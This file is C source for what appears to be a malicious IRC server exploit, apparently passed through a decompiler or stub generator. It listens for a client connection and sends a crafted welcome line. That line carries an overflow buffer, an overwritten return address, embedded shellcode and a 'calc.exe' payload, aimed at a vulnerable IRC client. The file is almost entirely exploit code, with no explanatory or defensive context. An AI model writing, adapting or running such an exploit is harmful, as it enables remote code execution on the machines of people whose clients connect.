
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int dummy; } ;
typedef int buf1 ;
typedef int WSADATA ;
typedef int WORD ;
typedef int SockAdr ;
typedef int SOCKET ;
typedef int HANDLE ;


 int MAGICNUMBER ;
 int MAKEWORD (int,int) ;
 int OFFSET ;
 int Sleep (int) ;
 int WSAStartup (int ,int *) ;
 int accept (int ,struct sockaddr_in*,int*) ;
 int closesocket (int ) ;
 int memset (char*,char,int) ;
 int openlistensocket () ;
 int printf (char*,...) ;
 int send (int ,char*,int ,int ) ;
 char* shellcode ;
 int sprintf (char*,char*,char*,char*,char*) ;
 int strlen (char*) ;

void main() {
  SOCKET s,client;
  char buf1[300],
       buf2[190],
       buf3[1500];

  WORD wVersionRequested;
  WSADATA wsaData;
  HANDLE h;
  int wsErr;
  int len, *i;
   struct sockaddr_in SockAdr;

  wVersionRequested = MAKEWORD( 1, 1 );
  wsErr = WSAStartup( wVersionRequested, &wsaData );
  printf("1: Initialising %u\n",wsErr);
  if ( wsErr != 0 ) {


    printf("Failed to start winsock exiting\n");
    return;
  }


  s = openlistensocket();


  len = sizeof(SockAdr);
  client = accept(s, &SockAdr, &len);
  printf("Accepted\n");


  memset(buf1, 'X', sizeof(buf1));
  memset(buf2, 'Y', sizeof(buf1));
  buf1[204] = 0;
  buf2[OFFSET+3] = 0;


  buf2[OFFSET] = 0x94;
  buf2[OFFSET+1] = 0x74;
  buf2[OFFSET+2] = 0x55;


  i = (int *)(buf1+200);
  *i = MAGICNUMBER;


  sprintf(buf3, ":testserver 001 %s%scalc.exe :ddd\n:testserver 001 %s :x\n:testserver 001 test :x\n", buf1,shellcode,buf2);


  send(client, buf3, strlen(buf3),0);


  printf("Waiting\n");
  Sleep(10000);


  closesocket(client);
  closesocket(s);
}
